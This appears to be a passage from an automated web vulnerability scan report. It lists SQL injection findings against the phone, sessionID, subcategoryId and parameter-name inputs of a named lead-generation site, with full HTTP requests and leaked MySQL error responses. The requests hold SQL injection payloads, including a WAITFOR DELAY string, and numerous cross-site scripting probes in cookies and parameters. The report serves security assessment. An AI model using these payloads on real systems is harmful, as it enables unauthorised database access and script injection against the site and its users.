The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dgbnpgknbsevanovfsnhkhl1d5; path=/
Content-Length: 6670
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.143. http://www.insideup.com/ppc/leadflow/caad00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the phone parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b24qe18qtfo91roi7k7321gdf4; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.144. http://www.insideup.com/ppc/leadflow/caad00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lh6f0ggenrs8p2k245i4g8c2m5; path=/
Content-Length: 6702
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1qhilpa33muupcjda2cbv3l716; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.145. http://www.insideup.com/ppc/leadflow/caad00/project.php [sessionID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The sessionID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the sessionID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e'; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dob3g5mv8tmiqdq0c1cd776h02; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.146. http://www.insideup.com/ppc/leadflow/caad00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the subcategoryId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
